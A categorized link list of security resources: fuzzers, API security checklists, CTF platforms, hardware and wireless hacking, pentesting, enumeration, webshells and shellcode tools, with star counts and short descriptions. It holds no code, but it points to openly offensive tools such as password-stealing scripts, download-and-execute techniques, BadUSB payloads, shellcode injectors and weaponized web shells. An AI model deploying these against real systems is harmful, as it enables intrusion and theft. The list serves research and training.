| ffuf | 12,704 | 5 months ago | : Fast web fuzzer written in Go |
| rFuss2 | 23 | over 3 years ago | : Simple rust fuzzer |
| RESTler finds security and reliability bugs through automated fuzzing | . : is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. : Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows | ||
| Jackalope | 1,094 | 2 months ago | : Binary, coverage-guided fuzzer for Windows and macOS |
| Dynamic Program Analysis | by Dmitry Vyukov: | ||
| Fuzzing the Linux Kernel | by Andrey Konovalov | ||
| Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors | |||
| AFLplusplus | 5,202 | 7 days ago | : The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more! |
| s a n d s i f t e r | 485 | about 6 years ago | : The x86 processor fuzzer |
| sandsifter | 485 | about 6 years ago | : The x86 processor fuzzer |
| Fuzzing-101 | 3,222 | 6 months ago | : Do you want to learn how to fuzz like a real expert, but don't know how to start? |
| The Challenges of Fuzzing 5G Protocols | |||
| Fuzzing Workshops | |||
| AFLNet | 872 | 4 months ago | : A Greybox Fuzzer for Network Protocols |
| ClusterFuzz | : is a scalable fuzzing infrastructure that finds security and stability issues in software | ||
| Introduction to VirtualBox security research | |||
CSIRT / Secure Programming / API | |||
| The Web API Checklist | : 43 Things To Think About When Designing, Testing, and Releasing your API | ||
| API-Security-Checklist | 22,480 | 7 days ago | : Checklist of the most important security countermeasures when designing, testing, and releasing your API |
| REST API Checklist | |||
| Your Comprehensive Web API Design Checklist | |||
| API Security Testing | : Rules And Checklist | ||
CSIRT / Secure Programming / API / API Security Testing | |||
| Part 1 of 3 | |||
| Part 2 of 3 | |||
| Part 3 of 3 | |||
CSIRT / Secure Programming / API | |||
| API Security Checklist | 22,480 | 7 days ago | : Checklist of the most important security countermeasures when designing, testing, and releasing your API |
| Istio | 36,086 | 5 days ago | : An open platform to connect, manage, and secure microservices |
| How to contact Google SRE: Dropping a shell in cloud SQL | |||
| hack-requests | 466 | over 1 year ago | : The hack-requests is an http network library for hackers |
| Free API and Microservice Books | |||
| MindAPI | 823 | about 2 months ago | : Organize your API security assessment by using MindAPI. It's free and open for community collaboration |
| OWASP API Security Project | |||
| Here you can find a variaty of resources to help you out on the API security path. | |||
| Introducing vAPI – an open source lab environment to learn about API security | |||
| REST API Testing Tutorial | : Sample Manual Test Case | ||
| REST Security Cheat Sheet | 28,160 | 4 days ago | : CheatSheetSeries |
| Penetration Testing RESTful Web Services | |||
| RESTful web services penetation testing | |||
| Astra | : Automated Security Testing for REST API’s | ||
| bad_json_parsers | 366 | almost 2 years ago | : Exposing problems in json parsers of several programming languages |
CSIRT / CTFs / CTFd: | |||
| Deploying CTFd | |||
| CTFd Tips | |||
CSIRT / CTFs | |||
| Mellivora | 441 | 11 months ago | is a CTF engine written in PHP |
| Boss of the SOC (BOTS) Dataset Version 3 | 291 | over 4 years ago | |
| SA-ctf_scoreboard | 118 | almost 3 years ago | |
| The fast, easy, and affordable way to train your hacking skills. | |||
| Write-ups for crackmes and CTF challenges | 49 | almost 2 years ago | by eleemosynator |
| pwntools | 12,117 | 21 days ago | : CTF framework and exploit development library |
| google-ctf | 4,529 | 10 days ago | |
| Pwn2Win 2018 | |||
| Leap Security | |||
| 35c3ctf-challs | 88 | almost 6 years ago | |
| ctf-tasks | 608 | almost 3 years ago | : An archive of low-level CTF challenges developed over the years |
| $50 million CTF Writeup | 586 | over 5 years ago | |
| Alice sent Bob a meme | UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm | ||
| RsaCtfTool | 5,743 | 8 days ago | : RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data |
| RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED | |||
| BalsnCTF-2019 | 33 | over 1 year ago | by CykuTW |
| HackTheBox CTF Cheatsheet | 1,544 | over 1 year ago | : This cheasheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty |
| Mumbai:1 Vulnhub Walkthrough | |||
| 0x0G 2020 CTF | |||
| FIRST SecLounge CTF 2020 Solutions | |||
| Hitcon2017CTF - 家徒四壁Everlasting Imaginative Void | |||
| r2dec | |||
| SASatHome | |||
| Crypton | 1,491 | over 3 years ago | : Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs |
| Bash injection without letters or numbers - 33c3ctf hohoho | |||
| Writeup CTF - Web API Exploitation | |||
| Closing Capture the Flag Session & Winning Team Presentation | |||
| attack & defense CTF demo | 15 | over 6 years ago | |
| Deploying CTFd | |||
| ctftool | 1,641 | about 3 years ago | : Interactive CTF Exploration Tool |
| CTF-Writeups | 15 | over 2 years ago | : writeups for Capture The Flag Competitions |
| Capture the Flag | |||
| DEF CON CTF 2021 QUALS | and , | ||
| eDump | |||
| HITB SECCCONF EDU CTF 2021 | 19 | about 3 years ago | : Developed with  by Hackerdom team and HITB |
| Planilhas Baby | Latinoware CTF 2021 | ||
| CTF KAVACON 21 – LUZ ROJA, LUZ VERDE | |||
| RET2 WarGames | |||
| CTF: Aprende «hacking» jugando | (es) | ||
| HackLab #1 | (es) | ||
| Penetration testing laboratories "Test lab" | emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills | ||
| Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle | |||
CSIRT / CTFs / CTFs tools | |||
| CTFs-Exploits | 1 | about 2 years ago | |
| nc-chat-ctf | 4 | over 7 years ago | : Chat Server for CTF Players wrapped in SSL |
| thg-framework | 8 | almost 2 years ago | |
| Super-Guesser-ctf | 109 | over 2 years ago | |
| Ciphr | 115 | over 6 years ago | : CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses |
| sec-tools | 650 | over 3 years ago | : A set of security related tools |
| Real World CTF 2023 | : Solving a Java CTF challenge by writing static analysis passes! | ||
CSIRT / Phreak | |||
| ss7MAPer | ( ) | ||
| Into the wild: Gaining access to SS7 - Part 1: Finding an access point | |||
| SCTP/SIGTRAN & SS7 Overview | |||
| Security Penetration Test Framework for the Diameter Protocol | |||
| Signaling Security in LTE Roaming | |||
| Phrack | |||
CSIRT / Archs | |||
| LAB ENVIRONMENT | ARM | ||
| HUB | Azure IoT | ||
| A collection of vulnerable ARM binaries for practicing exploit development | 898 | about 3 years ago | |
| arm vm working out of the box for everyone | 867 | about 2 years ago | |
| Statically compiled ARM binaries for debugging and runtime analysis. | 462 | over 3 years ago | |
| Hacker Finds Hidden 'God Mode' on Old x86 CPUs | -> : Hardware backdoors in some x86 CPUs | ||
| USBHarpoon | Is a BadUSB Attack with A Twist | ||
| Patching Binaries with Radare2 - ARM64 | Ground Zero: Part 3-2 | ||
| A 2018 practical guide to hacking RFID/NFC | |||
| riscv-ida | 29 | about 4 years ago | : RISC-V ISA processor module for IDAPro 7.x |
| mac-age | 577 | 6 days ago | : MAC address age tracking |
| Lexra | : Lexra did implement a 32-bit variant of the MIPS architecture | ||
| IntelTEX-PoC | 509 | over 4 years ago | : Intel Management Engine JTAG Proof of Concept |
| me_cleaner | 4,505 | 6 months ago | : Tool for partial deblobbing of Intel ME/TXE firmware images |
| Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms | |||
| IDA-scripts | 93 | over 5 years ago | : IDAPro scripts/plugins |
| Something about IR optimization | : Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself | ||
| Dragonblood | : Analysing WPA3's Dragonfly Handshake | ||
| The Hacker's Hardware Toolkit | 2,078 | about 4 years ago | : The best hacker's gadgets for Red Team pentesters and security researchers |
| Unfixable Seed Extraction on Trezor | A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$ | ||
| Extracting seed from Ellipal wallet | |||
| Breaking Trezor One with Side Channel Attacks | : A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes | ||
| Rewriting Functions in Compiled Binaries | |||
| Deep Dive | : Machine Check Error Avoidance on Page Size Change | ||
| Saleae | : Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits | ||
| wacker | 295 | over 1 year ago | : A WPA3 dictionary cracker |
| Osiris | : | ||
| One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization | |||
CSIRT / Archs / Hardware | |||
| Wifi-Ducky-ESPUSB | 7 | about 4 years ago | |
| USB Attacks: Past, Present and Future | , - P4wnP1 is below on pentesting section | ||
| PLATYPUS | : With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs | ||
| VoltPillager | : Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface | ||
| Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I | 30 | about 4 years ago | |
| ToorCon 14 Badge | , and | ||
| HammerKit | 78 | over 3 years ago | : HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms |
| Evil Logitech | erm I ment USB cable | ||
| Hacker's guide to deep-learning side-channel attacks: the theory | . : Side Channel Attacks Assisted with Machine Learning | ||
| Guarding Against Physical Attacks: The Xbox One Story | |||
| Common BMC vulnerabilities and how to avoid repeating them | , | ||
CSIRT / Archs / Hardware / Blutetooth: | |||
| BLEAH | 1,097 | almost 6 years ago | : A BLE scanner for "smart" devices hacking |
| BrakTooth | : Causing Havoc on Bluetooth Link Manager | ||
| Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack | |||
| The Practical Guide to Hacking Bluetooth Low Energy | |||
| A Practical Guide to BLE Throughput | |||
| Exploiting IoT enabled BLE smart bulb security | |||
CSIRT / Archs / Hardware / Wireless / Wifi: | |||
| ESP8266 Deauther Version 2 | 13,512 | 3 months ago | : Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners! |
| Airspy-Utils | 13 | about 1 year ago | : is a small software collection to help with firmware related operations on Airspy HF+ devices |
| infernal-twin | 1,236 | about 2 years ago | : wireless hacking - This is automated wireless hacking tool |
| Cracking WiFi at Scale with One Simple Trick | |||
| hcxdumptool | 1,837 | 11 days ago | : small tool to capture packets from wlan devices |
CSIRT / Archs / Hardware / Drone: | |||
| SkyJack | is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control | ||
| eaphammer | 2,194 | 2 months ago | : Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks |
| whereami | 5,118 | 12 months ago | : Uses WiFi signals and machine learning to predict where you are |
CSIRT / Archs / Hardware / Car Hacking: | |||
| Car hijacking swapping a single bit | |||
| Hacking a VW Golf Power Steering ECU | Part 1, and | ||
CSIRT / Archs / Hardware / Internet of Things (IoT): | |||
| BMC-Tools | 479 | 12 months ago | : RDP Bitmap Cache parser |
| Hacking Printers Wiki | |||
| Full key extraction of NVIDIA™ TSEC | |||
CSIRT / Archs / Hardware | |||
| The x86 architecture is the weirdo, part 2 | |||
| awesome flipper | 18,960 | about 2 months ago | : 🐬 A collection of awesome resources for the Flipper Zero device |
| Dark Flipper | 17,564 | 11 days ago | : Flipper Zero Unleashed Firmware |
| My Flipper Shits | 1,170 | 24 days ago | : Free and libre source BadUSB payloads for Flipper Zero. [Windows, GNU/Linux, iOS] |
| Reverse Engineering Yaesu FT-70D Firmware Encryption | |||
| Reverse-engineering an airspeed/Mach indicator from 1977 | |||
| Stepping Insyde System Management Mode | : Intel’s Alder Lake BIOS source code was | ||
CSIRT / Archs / ARM / Arm Heap Exploitation, by Azeria: | |||
| AZM Online Arm Assembler | |||
| Understanding the Glibc Heap Implementation | Part 1: | ||
| Understanding the GLIBC Heap Implementation | Part 2: | ||
| Heap Exploit Development | – Case study from an in-the-wild iOS 0-day | ||
CSIRT / Archs / ARM | |||
| ARM64 Reversing and Exploitation | by : | ||
CSIRT / Archs / ARM / ARM64 Reversing and Exploitation | |||
| ARM Instruction Set + Simple Heap Overflow | Part 1 - | ||
| Use After Free | Part 2 - | ||
| A Simple ROP Chain | Part 3 - | ||
CSIRT / Pentesting | |||
| Awesome Penetration Testing | 21,934 | 28 days ago | : A collection of awesome penetration testing resources, tools and other shiny things |
| Seclists | 58,770 | about 5 hours ago | is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place |
| osquery | Search operating systems on the network: | ||
| osquery Across the Enterprise | |||
| fleet | 3,118 | 7 days ago | : The premier osquery |
| Intrusion Detection | Penetration Testing Cheat Sheet For Windows Machine – | ||
CSIRT / Pentesting / Zero Day Zen Garden: | |||
| Part 0 | Windows Exploit Development - | ||
| Part 1 | Windows Exploit Development - | ||
| Part 2 | Windows Exploit Development - | ||
| Part 3 | Windows Exploit Development - | ||
| Part 4 | Windows Exploit Development - | ||
CSIRT / Pentesting | |||
| Got Meterpreter? PivotPowPY! | |||
| Pentest Tips and Tricks | |||
| Script to steal passwords from ssh. | 477 | almost 6 years ago | |
| Network Infrastructure Penetration Testing Tool | 1,618 | over 3 years ago | |
| tcp connection hijacker | 463 | 23 days ago | |
| "EAST" PENTEST FRAMEWORK | |||
| Pown.js | 259 | over 1 year ago | : is the security testing an exploitation framework built on top of Node.js and NPM |
| Sandmap | 1,578 | almost 2 years ago | is a tool supporting network and system reconnaissance using the massive Nmap engine |
| trackerjacker | 2,636 | 10 months ago | : Like nmap for mapping wifi networks you're not connected to, plus device tracking |
| TIDoS-Framework | 1,782 | over 1 year ago | : The offensive web application penetration testing framework |
| GitMiner | 2,092 | about 4 years ago | : Tool for advanced mining for content on Github |
| DHCPwn | 667 | over 6 years ago | : All your IPs are belong to us |
| badKarma | 418 | almost 6 years ago | : advanced network reconnaissance toolkit |
| Danger-zone | 674 | over 4 years ago | : Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files |
| go-tomcat-mgmt-scanner | 28 | almost 5 years ago | : A simple scanner to find and brute force tomcat manager logins |
| IoTSecurity101 | 2,726 | about 1 month ago | : From IoT Pentesting to IoT Security |
| IoT Pentesting | and : A Virtual environment for Pentesting IoT Devices | ||
| red_team_telemetry | 98 | almost 6 years ago | |
| SharpSploitConsole | 178 | almost 3 years ago | : SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit |
| CrackMapExec | 8,453 | 12 months ago | : A swiss army knife for pentesting networks |
| DarkSpiritz | : A penetration testing framework for Linux, MacOS, and Windows systems | ||
| proxycannon-ng | 610 | almost 2 years ago | : A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference |
| PentestHardware | 492 | over 5 years ago | : Kinda useful notes collated together publicly |
| MarkBaggett’s gists | : This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation | ||
| Serverless Toolkit for Pentesters | |||
| pentest_scripts | 137 | about 5 years ago | : scrapes linkedin and generates emails list |
| Penetration Testing Tools Cheat Sheet ∞ | : Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test | ||
| IVRE | : Network recon framework ( ) | ||
| DomainInformation | 0 | almost 6 years ago | (pt-br) : Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =) |
| Spawning a TTY Shell | : Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system | ||
| LeakLooker | : Find Open Databases in Seconds | ||
| pown-recon | 421 | about 2 years ago | : A powerful target reconnaissance framework powered by graph theory |
| Micro8 | 18,046 | over 3 years ago | : The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source |
| Payloads All The Things | 61,485 | 4 days ago | : A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! |
| Penetration Test Guide based on the OWASP + Extra | 2,478 | over 2 years ago | : This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty |
CSIRT / Pentesting / Penetration Test Guide based on the OWASP + Extra | |||
| Insecure Direct Object References | 2,478 | over 2 years ago | (OTG-AUTHZ-004) |
CSIRT / Pentesting | |||
| pentesting tool for finding vulnerabilities in web applications | OWASP ZAP w2019-10-14 released: | ||
| Order of the Overflow Proxy Service | 13 | over 5 years ago | |
| liffy | 789 | over 1 year ago | : Local file inclusion exploitation tool |
| foxyproxy.json | : Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter | ||
| pentest_compilation | 1,327 | almost 2 years ago | : Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios |
| Linux for Pentester | : ZIP Privilege Escalation | ||
| Presentation Clickers | 96 | about 5 years ago | : Keystroke injection vulnerabilities in wireless presentation clickers |
| postwoman | 65,598 | 4 days ago | : alien API request builder - A free, fast, and beautiful alternative to Postman |
CSIRT / Pentesting / Better API Penetration Testing with Postman: | |||
| Part 1 | |||
| Part 2 | |||
| Part 3 | |||
| Part 4 | |||
CSIRT / Pentesting | |||
| DNS and DHCP Recon using Powershell | |||
| SiteBroker | 417 | 6 months ago | : A cross-platform python based utility for information gathering and penetration testing automation! |
| PENTESTING-BIBLE | 12,914 | over 1 year ago | : This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources |
| Nikto | 8,623 | 7 days ago | : web server scanner |
| Nikto: A Practical Website Vulnerability Scanner | |||
| NetAss2 | : | ||
| CSS Injection Primitives | |||
| physical-docs | 472 | about 5 years ago | : This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments |
| pentest-tools | 3,152 | over 1 year ago | : Custom pentesting tools |
| HACKING WITH ENVIRONMENT VARIABLES | : Interesting environment variables to supply to scripting language interpreters | ||
| rootend | 146 | about 3 years ago | : A *nix Enumerator & Auto Privilege Escalation tool |
| DroneSploit | 1,443 | about 1 year ago | : Drone pentesting framework console |
| HAck Tricks | ( ): Here you will find the typical flow that you should follow when pentesting one or more machines | ||
| Huawei_Thief | 26 | about 4 years ago | : Huawei DG8045 & HG633 Devices Exploitation Tool |
| urldozer | 29 | over 4 years ago | : Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]) |
| Pentesting Cheatsheets | |||
| Snaffler | 2,133 | 21 days ago | : a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ) |
| Several ways to download and execute malicious codes (LOLBAS) | |||
CSIRT / Pentesting / Several ways to download and execute malicious codes (LOLBAS) | |||
| coregen.exe | |||
CSIRT / Pentesting | |||
| Jok3r | 1,030 | 6 months ago | : Network and Web Pentest Automation Framework |
| Penetration Testing Cheat Sheet | 660 | 5 days ago | |
| BBT | 1,720 | 8 months ago | Bug Bounty Tools |
| P4wnP1 A.L.O.A. | 3,775 | about 1 year ago | by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance" |
| AriaCloud | 133 | over 3 years ago | : A Docker container for remote penetration testing |
| RustScan | 14,669 | 10 days ago | : The Modern Day Port Scanner |
| Impacket | 13,551 | 29 days ago | : is a collection of Python classes for working with network protocols |
| fiddler | : Capturing web traffic logs | ||
| SecLists | 58,770 | about 5 hours ago | : is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more |
| 21 - Pentesting FTP | |||
| PwnWiki.io | is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained | ||
| post-exploitation | 1,554 | over 4 years ago | : Post Exploitation Collection |
| Proxyjump, the SSH option you probably never heard of | |||
| GLORP | 249 | 2 months ago | : A CLI-based HTTP intercept and replay proxy |
| Sec4US's cheatsheets | : a lot of about shellcoding and bufferoverflow | ||
| Pentesting 101: Working With Exploits | |||
| SMB AutoRelay | 47 | almost 4 years ago | : SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments |
| Decoder++ | 101 | 8 months ago | : An extensible application for penetration testers and software developers to decode/encode data into various formats |
| SCShell | 1,400 | over 1 year ago | : Fileless lateral movement tool that relies on ChangeServiceConfigA to run command |
| bulwark | 180 | 4 days ago | : An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports |
| A Noob Guide to setup your Own OOB DNS Server | : : A Bind9 server for pentesters to use for Out-of-Band vulnerabilities | ||
| Interactsh | 3,445 | 5 days ago | : An OOB interaction gathering server and client library |
| DNSLOG | 4 | almost 5 years ago | : dnslog dns / dns rebinding platform |
| Pre-engagement | |||
| pentest, should I do it? | |||
| White Box Penetration Testing: “Cheating” in order to boost impact and value | |||
| Weird Proxies | 1,780 | about 1 year ago | : Reverse proxies cheatsheet |
| Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal. | |||
| pwncat | 1,793 | about 2 years ago | : netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE) |
| From Python to .Net | |||
| offensiveph | 329 | about 3 years ago | : use old Process Hacker driver to bypass several user-mode access controls |
| Penetration Testing - An Introduction | by cirl.lu | ||
| mitmproxy | 36,838 | 8 days ago | : |
| Poor Man's Pentest | 551 | over 3 years ago | : This a collection of the code that I have written for the Poor Man's Pentest presentation |
| Operator's Decalogue | |||
| LOTS | Living Off Trusted Sites ( ) Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain | ||
| Filesec.io | : Stay up-to-date with the latest file extensions being used by attackers | ||
| EMBArk | 321 | 3 months ago | : The firmware security scanning environment |
| EMBA | 2,700 | 5 days ago | : The security analyzer for embedded device firmware |
| OffensiveNim | 2,840 | 6 months ago | : My experiments in weaponizing Nim |
| White Box Penetration Testing: “Cheating” in order to boost impact and value | |||
| Python Penetration Testing Cheat Sheet | |||
CSIRT / Pentesting / Reconnaissance | |||
| Automated Reconnaissance Pipeline | 428 | almost 2 years ago | : An automated target reconnaissance pipeline |
| PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL | |||
| subfinder | 10,277 | 11 days ago | is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing |
| urlhunter | 1,512 | about 1 year ago | : a recon tool that allows searching on URLs that are exposed via shortener services |
| URLBrute | 48 | almost 4 years ago | : Directory/Subdomain scanner developed in GoLang |
| degoogle | 494 | over 2 years ago | : search Google and extract results directly. skip all the click-through links and other sketchiness |
| Investigator | 256 | about 1 year ago | : An online handy-recon tool |
CSIRT / Pentesting / Enumeration | |||
| linux-smart-enumeration | 3,443 | 11 months ago | : Linux enumeration tool for pentesting and CTFs with verbosity levels |
| Ethical Hacking Course: Enumeration Theory | |||
| Sublist3r | 9,885 | 4 months ago | : Fast subdomains enumeration tool for penetration testers |
| subscraper | 822 | 5 months ago | : External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps |
| massh-enum | 146 | about 5 years ago | : OpenSSH 7.x Mass Username Enumeration |
| LinEnum | 7,032 | about 1 year ago | : Scripted Local Linux Enumeration & Privilege Escalation Checks |
| linpostexp | 176 | over 4 years ago | : Linux post exploitation enumeration and exploit checking tools |
| Social Mapper | A Social Media Enumeration & Correlation Tool | ||
| The art of subdomain enumeration | 639 | almost 6 years ago | : This repository contains all the supplement material for the book "The art of sub-domain enumeration" |
| social_mapper | 3,808 | over 2 years ago | : A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf) |
| LEGION | 877 | about 1 year ago | Automatic Enumeration Tool |
| discover | 3,444 | about 2 months ago | Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit |
| Z/OS System Enumeration Scripts | 63 | 18 days ago | : PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL |
| WPExploitation | 0 | 11 months ago | : simples scripts to help windows enumeration |
| CTFR | 1,972 | 11 months ago | does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs |
| feroxbuster | 5,954 | 2 months ago | : A fast, simple, recursive content discovery tool written in Rust |
| grinder | 290 | over 3 years ago | : Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys) |
| Admin-Scanner | 157 | almost 4 years ago | : This tool is to design to find admin panel of websites |
| Virtual host scanner | 665 | almost 7 years ago | : A script to enumerate virtual hosts on a server |
| vhost-brute | 84 | almost 2 years ago | : A PHP tool to brute force vhost configured on a server |
| grab_beacon_config | 446 | over 3 years ago | : nmap strip to get beacon info |
| assetfinder | 3,045 | 6 months ago | : Find domains and subdomains related to a given domain |
CSIRT / Pentesting / Enumeration / Wordlists: | |||
| hackerone_wordlist | 0 | about 1 year ago | : The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform |
| paths wordlists | |||
| subdomains wordlists | |||
| parameters wordlists | |||
| How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists | |||
| Assetnote Wordlists | : When performing security testing against an asset, it is vital to have for content and subdomain discovery | ||
| Duplicut | 881 | over 2 years ago | : Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking) |
| Weakpass | rule-based online generator to create a wordlist based on a set of words entered by the user. is a distributed password brute-force system that focused on easy use | ||
| Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords. | 1,548 | over 2 years ago | |
| Default IoT Username/password | |||
| Elpscrk | 788 | about 1 month ago | : An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01) |
CSIRT / Pentesting / Enumeration | |||
| Ghost Eye | 270 | about 2 years ago | Informationgathering Footprinting Scanner and Recon Tool Release. Ghost Eye is an Information Gathering Tool I made in python 3. To run Ghost Eye, it only needs a domain or ip. Ghost Eye can work with any Linux distros if they support Python 3. Author: Jolanda de Koff |
| SuperEnum | 19 | about 8 years ago | : This script does the basic enumeration of any open port along with screenshots |
| Domain Dossier | : The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up | ||
| X41 BeanStack | : Java Fingerprinting using Stack Traces | ||
| Skanuvaty | 886 | over 2 years ago | : Dangerously fast DNS/network/port scanner |
| TireFire | 148 | 11 days ago | : Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing |
| OS Fingerprinting using NTP | |||
CSIRT / Pentesting / WebShells | |||
| novahot | 295 | 7 months ago | :A webshell framework for penetration testers |
| Weevely | 3,200 | about 1 month ago | : Weaponized web shell |
| Did you know that Python's simple web server can run CGI scripts | |||
| Web-Shells | 167 | almost 10 years ago | : (mostly php) |
CSIRT / Pentesting / ShellCodes | |||
| Why is My Perfectly Good Shellcode Not Working? | : Cache Coherency on MIPS and ARM | ||
| shellcode2asmjs | 36 | over 6 years ago | : Automatically generate ASM.JS JIT-Spray payloads |
| Shellen | 891 | over 3 years ago | :Interactive shellcoding environment to easily craft shellcodes |
| C-S1lentProcess1njector | : Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage | ||
CSIRT / Pentesting / ShellCodes / Windows: | |||
| Unicorn | 3,736 | 10 months ago | is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory |
| pe_to_shellcode | 2,374 | over 1 year ago | : Converts PE into a shellcode |
| stager.dll | 170 | over 4 years ago | : Code from this |
| ThreadBoat | 173 | 4 months ago | : Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application |
| Excel4-DCOM | 321 | over 5 years ago | : PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe) |
| MaliciousMacroMSBuild | 494 | over 5 years ago | : Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass |
| SnapLoader | : Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more | ||
CSIRT / Pentesting / ShellCodes / Linux: | |||
| Linux x86 Reverse Shell Shellcode | |||
| mem-loader.asm | : Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by | ||
CSIRT / Pentesting / ShellCodes | |||
| Shellab | : Linux and Windows shellcode enrichment utility | ||
| ShellcodeWrapper | 434 | almost 8 years ago | : Shellcode wrapper with encryption for multiple target languages |
| Fully (auto) interactive TTY shells | |||
